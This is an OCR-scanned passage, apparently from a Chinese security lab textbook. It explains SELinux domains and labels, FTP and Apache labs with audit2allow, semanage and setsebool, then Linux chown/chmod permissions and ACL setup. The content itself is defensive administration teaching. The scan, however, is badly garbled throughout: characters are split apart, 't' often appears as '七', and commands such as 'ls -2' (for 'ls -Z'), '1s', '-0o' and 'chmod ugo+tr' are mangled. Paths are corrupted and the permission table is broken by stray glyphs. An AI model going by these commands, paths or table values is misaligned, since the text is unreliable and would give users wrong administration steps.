允许 读 取 被 标 为 httpd_sys_content t 的 文件 ，httpd_t 就 不 能 用 别 的 端口 ， 也 不 能 更 改 那 
些 被 标 为 httpd_sys_content t 的 文件 (read only )。 

特点 3: domain 迁移 一 一 防止 权限 升级 。 

在 用 户 环境 里 运行 点 对 点 下 载 软件 azureus， 当 前 的 domain 是 和 b 但 是 , 考虑 到 安 
全 问题 , 打算 让 他 在 azureus t 里 运行 ,， 如果 在 terminal 里 用 命令 启动 azureus， 它 的 进程 
的 domain 就 会 默认 继承 实行 的 shell 的 fo t。 

有 了 domain 迁移 ， 就 可 以 让 azureus 在 指定 的 azureus t 里 运行 ， 在 安全 方面 ， 这 种 
做 法 更 可 取 ， 它 不 会 影响 到 包 t。 

下 面 是 domain 迁移 指示 的 例子 : 


domain auto trans (fu t, azureus exec t, azureus 七 ) 


意思 就 是 ， 当 在 tdomain 里 ， 实 行 了 被 标 为 azureus_exec t 的 文件 时 ，domain 从 
名 t 迁 移 到 azureus t。 图 9-4 是 Apache 启动 的 迁移 图 。 注 意 ， 因 为 从 哪 一 个 domain 能 
迁移 到 httpd_t 是 在 策略 里 定好 了 ， 所 以 要 是 手动 (/etc/init.d/httpd start) 启动 Apache， 
可 能 仍然 留 在 sysadm t 里 , 这 样 就 不 能 完成 正确 的 迁移 。 要 用 run_init 命令 来 手动 启动 。 


Httpd domain 


_ | 这 个 domain 可 读 取 

/usr/sbin/httpd | 触发 执行 | 的 资料 详细 地 列 在 | 可 读 写 | /var/www/html 
httpd_t ”| targeted 策 略 中 ， ”| httd_sys_content_t 

其 中 包括 可 读 取 的 


httpd_sys_content t 
类 型 


图 9-4 Apache 启动 迁移 图 
特点 4: RBAC (Role Base Access Control) 一 一 对 于 用 户 只 赋予 最 小 的 权限 。 
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对 于 用 户 来 说 ， 被 划分 成 一 些 ROLE， 即 使 是 ROOT 用 户 ， 要 是 不 在 sysadm r 里 ， 
也 还 是 不 能 实行 sysadm t 管理 操作 。 因 为 ， 哪 些 ROLE 可 以 执行 哪些 domain 也 是 在 策 
略 里 设 定 的 。ROLE 也 是 可 以 迁移 的 ， 但 是 也 只 能 按 策 略 规定 进行 迁移 。 

SELinux 是 个 经 过 安全 强化 的 Linux 操作 系统 ， 实 际 上 ， 基 本 上 原来 的 应 用 软件 没 
有 必要 修改 就 能 在 它 上 面 运行 。 真 正 做 了 特别 修改 的 RPM 包 只 要 50 多 个 。 像 文件 系统 
EXT3 都 是 经 过 了 扩展 。 对 于 一 些 原 有 的 命令 也 进行 了 扩展 ， 另 外 还 增加 了 一 些 新 的 命 
令 ， 接 下 来 就 来 看 看 这 些 命令 。 

1. 文件 操作 

1) ls 命令 

在 命令 后 加 个 -Z 或 者 加 -context: 


[root@mylivx var]# ls -2 
drwxr-xr-x root root system u:object r:acct data 七 account 
drwxr-xr-x pcap pcap system u:object r:arpwatch data t arpwatch 


drwxr-xr-x root root system u:object r:var t cache 
drwxr-xr-x root root system u:object r:var t crash 
drwxr-xr-x root root system u:object r:cvs data 七 cvs 

2) chcon 


更 改 文件 的 标签 : 


[root@mylivx tmp]# ls --context test.txt 

-rwWw-r--r-- root root root:object r:staff tmp t test.txt 
[root@mylivx tmp]# chcon -t etc 七 test.txt 

[root@mylivx tmp]# ls -lz test.txt 

-rw-r--r-- root root root:object r:etc 七 test.txt 


3) restorecon 

当 这 个 文件 在 策略 里 有 定义 时 ， 可 以 恢复 原来 的 文件 标签 。 

4) setfiles 

与 chcon 一 样 可 以 更 改 一 部 分 文件 的 标签 ， 不 需要 对 整个 文件 系统 重新 设 定 标签 。 

5) fixfiles 

一 般 是 对 整个 文件 系统 的 ， 后 面 一 般 跟 relabel。 对 整个 系统 relabel 后 ， 一 般 都 需 
要 重新 启动 。 如 果 在 根 目 录 下 有 .autorelabel 空 文件 ， 每 次 重新 启动 时 都 调用 fixfiles 


relabel。 


6) star 
就 是 tar 在 SELinux 下 的 互 换 命令 ， 能 把 文件 的 标签 也 一 起 备份 。 
7) cp 


可 以 跟 -Z, --context=CONTEXT， 在 拷贝 的 时 候 指定 目的 地 文件 的 security context。 
8) find 

可 以 跟 --context， 查 特定 type 的 文件 。 

例如 : 
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find /home/fu/ --context fu:fu r:amule t -exec ls -2 {} \: 


2. 模式 切换 
1) getenforce 


得 到 当前 的 SELinux 值 : 


[root@mylivx bin]# getenforce 


Permissive 


2) setenforce 


更 改 当 前 的 SELinux 值 ， 后 面 可 以 跟 enforcing、permissive 或 者 1、0: 
[root@mylivx bin]# setenforce permissive 


3) sestatus 
显示 当前 的 SELinux 的 信息 : 


[root@mylivx bin]# sestatus -Vv 

SELinux status: enabled 

SELinuxfs mount: /selinux 

Current mode: permissive 

Mode from config file: permissive 

Policy version: 20 

Policy from config file: refpolicy 

Process contexts: 

Current context: user u:user ri:user 七 

Init context: system u:system r:init 七 
/sbin/mingetty system u:system r:getty 七 
/usr/sbin/sshd system u:system r:sshd t 

File contexts: 

Controlling term: user u:object r:user devpts 七 
/etc/passwd system u:object r:etc t 
/etc/shadow system u:object r:shadow 七 
/bin/bash system u:object r:shell exec 七 
/bin/login system u:object r:login exec t 
/bin/sh system u:object r:bin t -> system u:object r:shell exec t 
/sbin/agetty system u:object r:getty exec 七 
/sbin/init system u:object r:init exec 七 
/sbin/mingetty system u:object r:getty exec 七 


3. 其 他 重要 命令 

1) audit2allow 

很 重要 的 一 个 以 Python 写 的 命令 , 主要 用 来 处 理 日 志 , 把 日 志 中 违反 策略 的 动作 的 
记录 ， 转 换 成 access vector， 对 开发 安全 策略 非常 有 用 。 在 refpolicy 里 ， 它 的 功能 比 以 
前 有 了 很 大 的 扩展 。 
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[root@mylivx log]# cat dmesg | audit2allow -m local > local.te 


2) checkmodule -m -0 local.mod local.te 
编译 模块 : 


[root@mylivx log]# checkmodule -m -o local.mod local.te 
checkmodule: loading policy configuration from local.te 
checkmodule: policy configuration loaded 

checkmodule: writing binary representation (version 5) to local.mod 


3) semodule package 
创建 新 的 模块 : 


[root@mylivx log]# semodule package -0o local.pp -m local.mod 


4) semodule 
可 以 显示 、 加 载 、 删 除 模块 。 
加 载 的 例子 : 


[root@mylivx log]# semodule -i local.pp 


5) semanage 

这 是 一 个 功能 强大 的 策略 管理 工具 ， 有 了 它 即 使 没有 策略 的 源 代码 ， 也 是 可 以 管理 
安全 策略 的 。 因 为 这 里 主要 是 介绍 用 源 代码 来 修改 策略 ， 详 细 用 法 可 以 参考 它 的 Man 

【实验 环境 】 

Red Hat Linux 操作 系统 ， 内 核 版 本 2.6 以 上 。 


【实验 步骤 】 
1. SELinux 下 匿名 FTP 的 使 用 
1) 确认 已 经 启用 了 SELinux 


[root@mylivx ~]# getenforce 
Enforcing 


2) 启动 FTP deamon 


[root@mylivx ~]# ps -ef2 |grep vsftpd 

root:system r:ftpd t:s0 root 12636 1 0 20:13 3? 

00:00:00 /usr/sbin/vsftpd /etc/vsftpd/vsftpd.conf 

3) 在 匿名 访问 目录 下 创建 两 个 文件 进行 测试 ,一 个 是 在 该 目录 下 手动 创建 ,这 样 该 
文件 会 自动 继承 /var/ftp/pub 下 的 目录 上 下 文 的 值 ， 一 个 用 mv 命令 从 root 目录 下 移动 过 
来 ， 这 样 的 文件 会 保留 root 目录 下 的 安全 上 下 文 ， 如 下 : 


[root@mylivx pub]# pwd 


Mr 


ee 信息 系统 安全 实验 教程 www] 


/var/ftp/pub 

[root@mylivx Pub]# echo "just a test" > test.txt 

[root@mylivx pub]# chmod 755 test.txt 

[root@mylivx pub]# ls -2 

-LIWXIL-XL-X root root root:object r:public content t:s0 test.txt 
[root@mylivx ~]# pwd 

/root 

[root@mylivx ~]# echo "aaal23" > root.txt 

[root@mylivx ~]# chmod 755 /root/root.txt 

[root@mylivx ~]# mv root.txt /var/ftp/pub/ 

[root@mylivx ~]# ls -2 /var/ftp/pub/ 

-rw-r-xr-x root root root:object r:user home t:s0 root.txt 
-rwWxr-xr-x root root root:object r:public content t:s0 test.txt 


4) 使 用 匿名 登录 测试 


[root@mylivx pub]# lftp localhost 

lftp localhost:~> cd pub 

cd ok, cwd=/pub 

lftp localhost:/pub> 1s 

二 于 册 基 芋 一 次 于 一 站 1 0 0 12 Rug 23 12:19 test.txt 
一 时 相关 于 一 站 下 一 丑 1 0 0 910974 Aug 04 02:19 yum 
lftp localhost:/pub> 


发 现 这 里 看 不 到 root.txt 文件 。 

5) 查看 日 志 

有 两 个 工具 可 以 收集 到 SELinux 产生 的 日 志 ， 一 个 是 setroubleshoot， 对 应 的 软件 包 
为 setroubleshoot-server-2.0.5-$.el15; 一 个 是 audit, 对 应 的 软件 包 名 称 是 audit-1.7.13-2.el5。 
先 使 用 audit 工具 ， 使 用 方法 如 下 。 

系统 中 提供 了 audit 相关 的 命令 , 常用 的 有 audit2why 和 audit2allow。audit 产生 的 日 
志 放 在 /var/log/audit， 由 于 此 文件 中 记录 的 信息 很 多 不 宜 直 接 查看 ， 可 以 借助 audit2why 
命令 ， 首 先 启动 audit deamon。 


[root@mylivx audit]# /etc/init.d/auditd status 

auditd is stopped 

[root@mylivx audit]# /etc/init.d/auditd start 

Starting auditd: [ OK ] 
[root@mylivx audit]# /etc/init.d/auditd status 

auditd (pid 4013) is running... 


在 客户 端 登录 FTP 服务 器 时 会 触发 audit deamon 产生 日 志 : 


[root@mylivx audit]# audit2why < /var/log/audit/audit.log 

type=AVC msg=audit (1282568240.414:268): avc: denied { getattr } for 
pid=4061 

comm="vsftpd" path="/pub/root.txt" dev=sdal ino=3634111 scontext=root: 
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System r:ftpd t:s0 
tcontext=root:object r:user home t:s0 tclass=file 
Was caused by: 

Missing or disabled TE allow rule. 

Allow rules may exist but be disabled by boolean settings; check boolean 
settings. 

You can see the necessary allow rules by running audit2allow with this 
audit message as input. 


AVC 是 Access Vector Cache 的 缩写 。 
根据 日 志 中 的 建议 ， 使 用 audit2allow 命令 查看 给 出 的 建议 如 下 : 


[root@mylivx audit]# audit2allow < /var/log/audit/audit.1log 
#=: 区 
allow ftpd t user home t:file getattr; 


[root@mylivx cnapp]# sesearch -a -s ftpd t -t user home 七 
Found 8 av rules: 
allow ftpd tuser home t : file { ioctl read write create getattr setattr 
lock append unlink link rename }; 
allow ftpd t user home t : file { ioctl read getattr lock }; 
allow ftpd t user home t : dir { ioctl read getattr lock search }; 
allow ftpd t user home t : lnk file { read create getattr setattr unlink 
link rename }; 


既然 /var/ftp/pub/test.txt 可 以 访问 ， 那 么 策略 里 肯定 是 allow 的 ， 且 /varftp/puby/test:txt 
的 安全 上 下 文 如 下 : 


-rwxr-xr-x root root root:object r:public content t:s0 /var/ftp/pub/ 
test.txt 


通过 上 面 的 命令 验证 一 下 策略 集中 是 否 有 该 定义 。 


[root@mylivx audit]# sesearch -a -s ftpd t -t public content t | head 4 
Found 14 av rules: 
allow ftpd t public content t : file { ioctl read getattr lock }; 
allow ftpd t public content t : dir { ioctl read getattr lock search }; 
allow ftpd t public content t : lnk file { read getattr }; 


那么 根据 这 个 思路 可 以 更 改 /var/ftp/pub/root.txt 的 安全 上 下 文 即 可 ， 可 用 chcon 命令 
先 对 刚才 的 改变 进行 还 原 : 


[root@mylivx audit]# setsebool -P ftp home dir 0 

[root@mylivx audit]# getsebool ftp home dir 

ftp_home dir --> off 

[root@mylivx audit]# ls /var/ftp/pub/root.txt -2Z 

-LIWXI-XL-X root root root:object r:user home t:s0 /var/ftp/pub/root.txt 
[root@mylivx audit]# chcon -t public content t /var/ftp/pub/root.txt 


人 fi9 


[root@mylivx audit]# ls /var/ftp/pub/root.txt -2Z 

—rWXr-xr-x root root root:object r:public content t:s0 /var/ftp/pub/ 
root.txt 

[root@mylivx audit]# lftp localhost 

lftp localhost:~> ls pub/root.txt 

=—rWXI—XI-—X 10 0 7 Mag 23 12835 rootstat 


6) 创建 一 个 账号 用 于 测试 


[root@mylivx pub]# useradd -d /zsgd -m zsgd 

[root@mylivx pub]# passwd zsgd (密码 是 aaal23) 

Changing password for user zsgd. 

New UNIX password: 

BAD PASSWORD: it does not contain enough DIFFERENT characters 
Retype new UNIX password: 

passwd: all authentication tokens updated successfully. 


用 创建 的 账号 登录 FTP 服务 器 ， 登 录 是 正常 的 ， 但 ls 等 操作 异常 ， 如 下 : 


[root@mylivx pub]# lftp -u zsgd localhost 

Password: 

lftp zsgd@localhost:~> 1s 

1s: Login failed: 500 OOPS: cannot change directory:/zsgd 


如 果 遇 到 这 种 情况 ， 需 要 验证 一 下 bool 值 。 其实 bool 值 是 策略 的 补充 ,会 发 现 布尔 
值 中 已 经 定义 了 ftp 访问 home 是 disable。 


[root@mylivx ~]# getsebool -a |grep ftp 
allow ftpd anon write --> off 
allow ftpd full access --> off 
allow ftpd use cifs --> off 
allow ftpd use nfs --> off 
allow tftp anon write --> off 
ftp_home dir --> off 

ftpd connect db --> off 

ftpd disable trans --> off 
ftpd is _ daemon --> on 

httpd enable ftp server --> off 
tftpd disable trans --> off 


修改 bool 值 : 


[root@mylivx ~]# setsebool -P ftp home dir 1 
[root@mylivx ~]# getsebool ftp home dir 
ftp_home dir --> on 


测试 : 
[root@mylivx ~]# lftp -u zsgd localhost 
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Password: 

lftp zsgd@localhost:~> ls -a 

GIWX--———= 4 6683 6683 4096 Aug 23 14:10 . 

drwxr-xr-x 340 0 4096 Aug 23 14:10 .. 

一 工 W 一 工 一 一 工 一 一 1 6683 6683 33 Rug 23 14:10 .bash logout 
=“ 1 6683 6683 176 Aug 23 14:10 .bash profile 
-IW-r--r-= 1 6683 6683 124 Aug 23 14:10 .bashrc 


2. Apache SELinux 配置 

1) 让 Apache 可 以 访问 位 于 非 默认 目录 下 的 网 站 文件 

首先 ， 用 semanage fcontext -1 | grep /varwww' 获 知 默认 /var/www 目录 的 SELinux 上 
下 文 : 


/var/www(/.*)? all files system u:object r:httpd sys_content t:s0 


从 中 可 以 看 到 Apache 只 能 访问 包含 httpd_sys_content t 标签 的 文件 。 

假设 希望 Apache 使 用 /srv/www 作为 网 站 文件 目录 ， 那 么 就 需要 给 这 个 目录 下 的 文 
件 增 加 httpd_sys_content t 标签 ， 分 两 步 实现 。 

首先 为 /srv/www 这 个 目录 下 的 文件 添加 默认 标签 类 型 : semanage fcontext -a -t 
httpd_sys_content t /srv/www(/.*)?。 然 后 用 新 的 标签 类 型 标注 已 有 文件 ， restorecon -Rv 
/srv/www。 之 后 Apache 就 可 以 使 用 该 目录 下 的 文件 构建 网 站 了 。 

其 中 restorecon 在 SELinux 管理 中 很 常见 ， 起 到 恢复 文件 默认 标签 的 作用 。 比 如 当 
从 用 户主 目录 下 将 某 个 文件 复制 到 Apache 网 站 目录 下 时 ，Apache 默认 是 无 法 访问 ， 因 
为 用 户主 目录 下 的 文件 标签 是 user_ home t。 此 时 就 需要 restorecon 将 其 恢复 为 可 被 
Apache 访问 的 httpd_sys_content t 类 型 : 

restorecon reset /srv/www/foo.com/html/file.html context unconfined u: 

object_r:user_home t:s0->system u:object _r:httpd sys_content t:s0 


2) 让 Apache 侦 听 非 标准 端口 
默认 情况 下 Apache 只 侦 听 80 和 443 两 个 端口 ， 若 是 直接 指定 其 侦 听 888 端口 ， 会 
在 service httpd restart 的 时 候 报错 : 


Starting httpd: (13) Permission denied: make_sock: could not bind to address 
[::]:888 

(13) Permission denied: make_ sock: could not bind to address 0.0.0.0:888 
no listening sockets available, shutting down 

Unable to open logs 


这 个 时 候 ， 若 是 在 桌面 环境 下 ，SELinux 故障 排除 工具 应 该 已 经 弹出 来 报错 了 。 若 


是 在 终端 下 ,可 以 通过 查看 /var/log/messages 日 志 然 后 用 sealert -1 加 编号 的 方式 查看 , 或 
者 直接 使 用 sealert -b 浏览 。 无 论 哪 种 方式 ， 和 以 下 内 容 会 比较 类 似 : 


SELinux is preventing /usr/sbin/httpd from name bind access on the 
tcP_socket port 888. 


之 


夺 业 四 和 ployin bind ports (92.2 confidence) Suggeaty 内 才 吉 丰 尖 古 守 汕 而 当 吉 省 才 击 客 和 

IE you want to allow /usr/sbin/httpd to bind to network port 888 

Then You need to modify the Port type. 

Do 

# semanage port -a -t PORT TYPE -p tcp 888 

'where PORT _TYPE is one of the following: ntop port t, http cache port t, 
http port te" 

**yw* Plugin catchall boolean (7.83 confidence) suggests **#wkW 炎 大 炎炎 内 
If you want to allow system to run with NIS 

Then you must tell SELinux about this by enabling the 'allow_ ypbind' 
boolean. 

Do 

Setsebool -P allow ypbind 1 

灶 灶 向 计 二 plugin catoehall (1.41 confidence) Sugg63t 记 刘 才 训 二 者 更 则 家 商 而 击 有 测 而 者 宰 击 

If you believe that httpd should be allowed name bind access on the port 
888 tcp_socket by default. 

Then you should report this as a bug. 

You can generate a local policy module to allow this access. 

Do 

allow this access for now by executing: 

# grep httpd /var/log/audit/audit.log | audit2allow -M mypol 

# semodule -i mypol.pp 


可 以 看 出 ，SELinux 根据 三 种 不 同情 况 分 别 给 出 了 对 应 的 解决 方法 。 在 这 里 ， 第 一 
种 情况 是 我 们 想 要 的 ， 于 是 按照 其 建议 输入 : 


semanage port -a -t http port t -p tcp 888 


之 后 再 次 启动 Apache 服务 就 不 会 有 问题 了 。 
这 里 又 可 以 见 到 semanage 这 个 SELinux 管理 配置 工具 。 它 的 第 一 个 选项 代表 要 更 
改 的 类 型 ， 然 后 紧 跟 所 要 进行 的 操作 。 详 细 内 容 可 参考 Man 手册 。 
3) 允许 Apache 访问 创建 私人 网 站 
若是 希望 用 户 可 以 通过 在 ~/public_ html/ 放置 文件 的 方式 创建 自己 的 个 人 网 站 ， 那 
么 需要 在 Apache 策略 中 允许 该 操作 执行 。 使 用 : 


Setsebool httpd enable homedirs 1 


setsebool 是 用 来 切换 由 布尔 值 控 制 的 SELinux 策略 的 ， 当 前 布尔 值 策略 的 状态 可 
以 通过 getsebool 来 获知 。 

默认 情况 下 ，setsebool 的 设置 只 保留 到 下 一 次 重启 之 前 ， 若 是 想 永久 生效 ， 需 要 添 
加 -P 参数 ， 比 如 : 


setsebool -P httpd enable homedirs 1 
【实验 报告 】 
描述 实验 过 程 ， 了 解 进入 SELinux 的 功能 。 
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【思考 题 】 
SELinux 对 比 传统 的 Linux 的 安全 有 何 异 同 ? 


93 文件 管理 


9.2.1 文件 权限 管理 


【实验 目的 】 
掌握 Linux 下 文件 管理 的 常用 命令 ， 了 解 Linux 下 的 文件 授权 机 制 。 


【原理 简介 】 

Linux 为 每 个 文件 都 分 配 了 一 个 文件 所 有 者 ， 称 为 文件 主 。 对 文件 的 控制 取决 于 文 
件 主 或 超级 用 户 (root)。 文 件 或 目录 的 创建 者 对 所 创建 的 文件 或 目录 拥有 特别 使 用 权 ， 
文件 的 所 有 关系 是 可 以 改变 的 ， 可 以 将 文件 或 目录 的 所 有 权 转 让 给 其 他 用 户 ， 但 只 有 文 
件 主 或 root 才 有 权 改 变 文 件 的 所 有 关系 。 

大 部 分 操作 系统 的 安全 机 制 ， 包 括 Windows 和 大 部 分 UNIX 和 Linux 系统 ， 只 
实现 了 “自主 访问 控制 (Discretionary Access Control，DAC)” 机 制 。DAC 机 制 只 是 根 
据 运 行程 序 的 用 户 的 身份 和 文件 等 对 象 的 所 有 者 来 决定 程序 可 以 做 什么 。 它 存在 超级 用 
户 AdministratorRoot， 黑 客 可 以 通过 漏洞 获取 这 个 权限 ， 也 就 等 于 拿 到 了 整个 系统 
的 控制 权 。 而 杀毒 软件 、IDS 以 及 补丁 程序 都 只 能 对 漏洞 起 修补 作用 ， 不 能 解决 系 
统 控制 权 问题 ， 这 就 是 现 有 服务 器 所 面临 的 根本 问题 。 

传统 Linux 系统 的 访问 控制 方法 是 非常 简单 的 ， 它 把 用 户 分 成 三 类 : 文件 的 拥有 者 、 
组 成 员 和 其 他 用 户 。 很 显然 ， 这 种 访问 控制 模型 过 于 简陋 了 。 随 着 对 Linux 系统 安全 性 
要 求 的 提高 , 需要 一 种 更 细 粒 度 的 访问 控制 模型 来 代替 传统 Linux 系统 的 访问 控制 模型 。 
使 用 ACL (Access Control List， 访 问 控制 列表 ) 系统 ， 系 统管 理 员 能 够 为 每 个 用 户 〈 包 
括 root 用 户 在 内 ) 对 文件 和 目录 的 访问 提供 更 好 的 访问 控制 。 在 POSIX 中 定义 了 一 种 访 
问 控制 叫 作 POSIX ACL， 可 以 实现 基于 单独 用 户 的 控制 。 当 前 ，Linux 能 够 在 ext2/ext3 
和 SGI 的 XFS 文件 系统 中 支持 POSIX ACL。 


【实验 环境 】 
Red Hat Linux 内 核 版 本 2.6 以 上 。 


【实验 步骤 】 

1. 改变 文件 或 目录 的 所 有 权 

文件 的 所 有 权 标 志 是 用 户 IDCUID )。chown 命令 可 以 更 改 某 个 文件 或 目录 的 所 有 权 。 
chown 命令 的 语法 格式 是 : chown [选项 ] 用 户 或 组 文件 1[ 文 件 2…]。 用 户 可 以 是 用 户 名 
或 用 户 ID。 文件 是 以 空格 分 开 的 要 改变 权限 的 文件 列表 ， 可 以 用 通配符 表示 文件 名 。 如 
果 改 变 了 文件 或 目录 的 所 有 权 ， 原 文件 主将 不 再 拥有 该 文件 或 目录 的 权限 。 系 统管 理 员 
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经 常 使 用 chown 命令 ， 在 将 文件 拷贝 到 另 一 个 用 户 的 目录 下 以 后 ， 让 用 户 拥 有 使 用 该 文 
件 的 权限 。 下 面 演示 了 root 用 户 拷贝 一 个 自己 的 文件 到 testuser 用 户 目录 下 ， 并 进行 文 
件 操 作 的 命令 。 可 以 看 出 ， 在 进行 chown 命令 前 ，testuser 用 户 不 能 写 mytest.txt 文件 ， 
在 执行 chown 命令 后 可 以 对 文件 进行 读 写 了 ， 结 果 如 下 : 


[root@mylivx testuser]# 11 

total 8 

-rw-r--r-- 1 root root 11 Aug 30 21:39 mytest.txt 
[root@mylivx testuser]# cp /root/mytest.txt /home/testuser 
[root@mylivx testuser]# cd /home/testuser 
[root@mylivx testuser] cat mytest.txt 

123456 

[root@mylivx testuser]# su - testuser 
[testuser@mylivx ~]$ 11 

total 8 

-rw-r--r-- 1 root root 11 Aug 30 21:42 mytest.txt 
[testuser@mylivx ~]$ echo testtext > mytest.txt 
-bash: mytest.txt: Permission denied 
[testuser@mylivx ~]$exit 

[root@mylivx testuser]# ls 

mytest.txt 

[root@mylivx testuser]# chown testuser mytest.txt 
[root@mylivx testuser]# 11 

total 8 

-rw-r--r-- 1 testuser root 11 Rug 30 21:42 mytest.txt 
[root@mylivx testuser]# su - testuser 
[testuser@mylivx ~]$ echo test test > mytest.txt 
[testuser@mylivx ~]$ cat mytest.txt 

test test 

[testuser@mylivx ~]$ 


在 Linux 下 ， 每 个 文件 又 同时 属于 一 个 用 户 组 。 当 创建 一 个 文件 或 目录 后 ， 系 统 会 
赋予 它 一 个 用 户 组 关系 ， 用 户 组 的 所 有 成 员 都 可 以 使 用 此 文件 或 目录 。 文 件 用 户 组 关系 
的 标志 是 GID。 文件 的 GID 只 能 由 文件 主 或 超级 用 户 〈root) 来 修改 。chgrp 命令 可 以 改 
变 文件 的 GID， 其 语法 格式 为 ，chgrp [选项 ] group 文件 名 。 其 中 group 是 用 户 组 ID, 文 
件 名 是 以 空格 分 开 的 要 改变 属 组 的 文件 列表 ， 它 支持 通配符 。 在 上 面 的 实验 中 更 改 了 
mytest.txt 的 属 主 , 没有 修改 它 的 组 , 它 的 组 仍然 是 root。 下 面 把 mytest.txt 文件 所 属 的 组 
修改 为 testuser， 执 行 结果 如 下 : 


[testuser@mylivx ~]$ chgrp testuser mytest.txt 
[testuser@mylivx ~]$ 11 

total 8 

-rw-r--r-- 1 testuser testuser 10 Aug 30 21:46 mytest.txt 
[testuser@mylivx ~]$ 
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2. 管理 文件 的 访问 权限 

Linux 系统 中 的 每 个 文件 和 目录 都 有 访问 许可 权限 ， 用 它 来 确定 谁 可 以 通过 何 种 方 
式 对 文件 和 目录 进行 访问 和 操作 。 访问 权限 规定 三 种 不 同类 型 的 用 户 : 文件 主 (owner)、 
同 组 用 户 〈(group)、 可 以 访问 系统 的 其 他 用 户 (others)。 

访问 权限 规定 三 种 访问 文件 或 目录 的 方式 : 读 (r)、 写 (w)、 可 执行 或 查找 (x)。 

当 用 ls -1 命令 或 1 命令 显示 文件 或 目录 的 详细 信息 时 ， 最 左边 的 一 列 为 文件 的 访问 
权限 ， 如 下 所 示 。 


[testuser@mylivx ~]$ 11 

total 8 

-rw-r--r-- 1 testuser testuser 10 Aug 30 21:46 mytest.txt 
[testuser@mylivx ~]$ 


其 中 各 位 的 含义 如 下 : 读 权限 (r) 表示 只 允许 指定 用 户 读 其 内 容 ， 而 禁止 对 其 做 任 
何 的 更 改 操作 。 将 所 访问 的 文件 的 内 容 作 为 输入 的 命令 都 需要 有 读 的 权限 ， 例 如 : cat、 
more 等 。 写 权限 (w) 表示 人 允许 指定 用 户 打开 并 修改 文件 ， 例 如 命令 vi、cp 等 。 执 行 权 
限 (x) 允许 指定 用 户 将 该 文件 作为 一 个 程序 执行 。 

目录 文件 的 使 用 权限 : 读 权限 (r) 可 以 列 出 存储 在 该 目录 下 的 文件 ， 即 读 目录 内 容 
列表 。 这 一 权限 允许 shell 使 用 文件 扩展 名 字符 列 出 相 匹配 的 文件 名 ， 写 权限 〈w) 表示 
允许 从 目录 中 删除 或 添加 新 的 文件 ,通常 只 有 目录 主 才 有 写 权 限 ; 执行 权限 (x) 允许 在 
目录 中 查找 ， 并 能 用 cd 命令 将 工作 目录 改 到 该 目录 。 

确定 了 一 个 文件 的 访问 权限 后 ， 用 户 可 以 利用 Linux 系统 提供 的 chmod 命令 来 重新 
设 定 不 同 的 访问 权限 。 使 用 方式 : chmod [-cfvR] [--help] [--version] mode file... 。 

mode 为 权限 设 定 字 串 ， 格 式 如 下 : [ugoa.…][[ 十 一 三 ][rwxX].…]L.]， 其 中 u 表示 该 
档案 的 拥有 者 ，g 表示 与 该 档案 的 拥有 者 属于 同一 个 群体 (group) 者 ，o 表示 其 他 人 ， 
a 表示 这 三 者 缘 是 ， 十 表示 增加 权限 、 一 表示 取消 权限 、= 表 示 唯 一 设 定 权 限 ; r 表示 可 
读 取 ，w 表示 可 写 入 , x 表示 可 执行 , X 表示 只 有 当 该 文件 是 个 子 目录 或 者 该 文件 已 经 
被 设 定 过 为 可 执行 。 

比如 将 文件 filel.txt 设 为 所 有 人 皆 可 读 取 : chmod ugo+tr filel.txt， 或 chmod ar+r 
filel.txt。 将 文件 filel.txt 与 file2.txt 设 为 该 文件 拥有 者 , 与 其 所 属 同一 个 群体 者 可 写 入 ， 
但 其 他 人 则 不 可 写 入 : chmod ug+w,o-w filel.txt file2.txt。 

此 外 chmod 也 可 以 用 数字 来 表示 权限 ， 如 chmod 777 file。 语 法 为 : chmod abc file， 
其 中 a、b、c 各 为 一 个 数字 ， 分 别 表示 User、Group 及 Other 的 权限 。r=4，w=2，x=1， 
若 要 rwx 属性 则 4+2+1=7; 若 要 rw- 属 性 则 4+2=6; 若 要 rx 属性 则 4+1=7。 

范例 : chmod a=rwx file 和 chmod 777 file 效果 相同 ，chmod ug=rwx，o=x file 和 
chmod 771 file 效果 相同 。 表 9-1 给 出 了 一 些 常见 的 文件 访问 权限 设置 值 。 
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表 9-1 文件 访问 权限 组 合 


访问 权限 “| 对 应 数值 说 明 
i 600 所 有 者 拥有 读 和 写 权 限 ， 大 多 数 文件 都 有 这 个 设置 

所 有 者 拥有 读 和 写 权限 ; 用 户 分 组 和 全 系统 拥有 只 读 权限 。 要 确定 是 否 
Ce 真 地 想 让 其 他 人 读 取 这 个 文件 

GE 人 人 都 拥有 读 和 写 权 限 。 不 推荐 这 种 做 法 , 因为 此 组 合 允 许 任何 人 从 系 
SO 统 中 的 任何 地 点 访问 该 文件 

i 所 有 者 拥有 读 、 写 和 执行 权限 ,对 所 有 者 打算 运行 的 程序 来 说 (从 C/C++ 
A 程序 编译 而 来 的 结果 文件 ) ， 这 是 最 佳 的 访问 权限 组 合 
-rwxr-xrx 755 所 有 者 拥有 读 、 写 和 执行 权限 。 其 他 人 拥有 读 和 执行 权限 

任何 人 都 拥有 读 、 写 和 执行 权限 。 和 设置 值 666 一 样 , 这 个 组 合 必须 避 

-TWXTWXIWX 777 免 使 用 

i 所 有 者 拥有 读 、 写 和 执行 权限 。 其 他 人 只 拥有 执行 权限 。 适用 于 打算 让 
We 其 他 人 执行 但 不 想 让 他 们 拷贝 的 程序 
a 这 是 一 个 使 用 mkdir 命令 建立 的 子 目 录 。 只 有 所 有 者 能 够 在 这 个 子 目录 
Nt 里 进行 读 写 操作 。 注 意 ， 所 有 的 子 目录 必须 设置 执行 位 x 
drwxr-xr-x 755 这 个 子 目录 只 能 够 由 所 有 者 进行 改动 ， 但 是 其 他 人 可 以 查看 它 的 内 容 
Se 让 子 目录 对 全 系统 可 读 ， 但 是 限制 使 用 ls 命令 的 访问 。 只 有 那些 知道 
We 其 名 字 的 人 才能 对 子 目 录 中 的 文件 进行 读 操作 

3. 配置 ACL 


ACL 是 从 客体 出 发 描述 控制 信息 ,可 以 用 来 对 某 一 资源 指定 任意 一 个 用 户 的 访问 权 
限 。 它 给 每 个 客体 建立 一 个 ACL， 记 录 该 客体 可 以 被 哪些 主体 访问 以 及 访问 的 形式 ， 限 
制 包括 root 用 户 在 内 的 所 有 用 户 对 文件 、 资源 或 套 接 字 的 访问 。Linux 内 核 2.5 以 上 都 支 
持 ACL 功能 。 

(1) 首先 配置 文件 系统 支持 ACL。Linux 系统 默认 并 没有 支持 ACL， 需 要 进行 配置 ， 
可 以 直接 修改 /etc/fstab 文件 。 
原文 件 : 


LABEL=/ / defaults 
LABEL=/boot /boot defaults 


LABEL=/home /home defaults 
LABEL=/usr /usr defaults 


在 defaults 后 面 添加 acl， 修 改 后 为 : 


LABEL=/ * ext2 defaults,acl 
LABEL=/boot /boot ext2 defaults,acl 
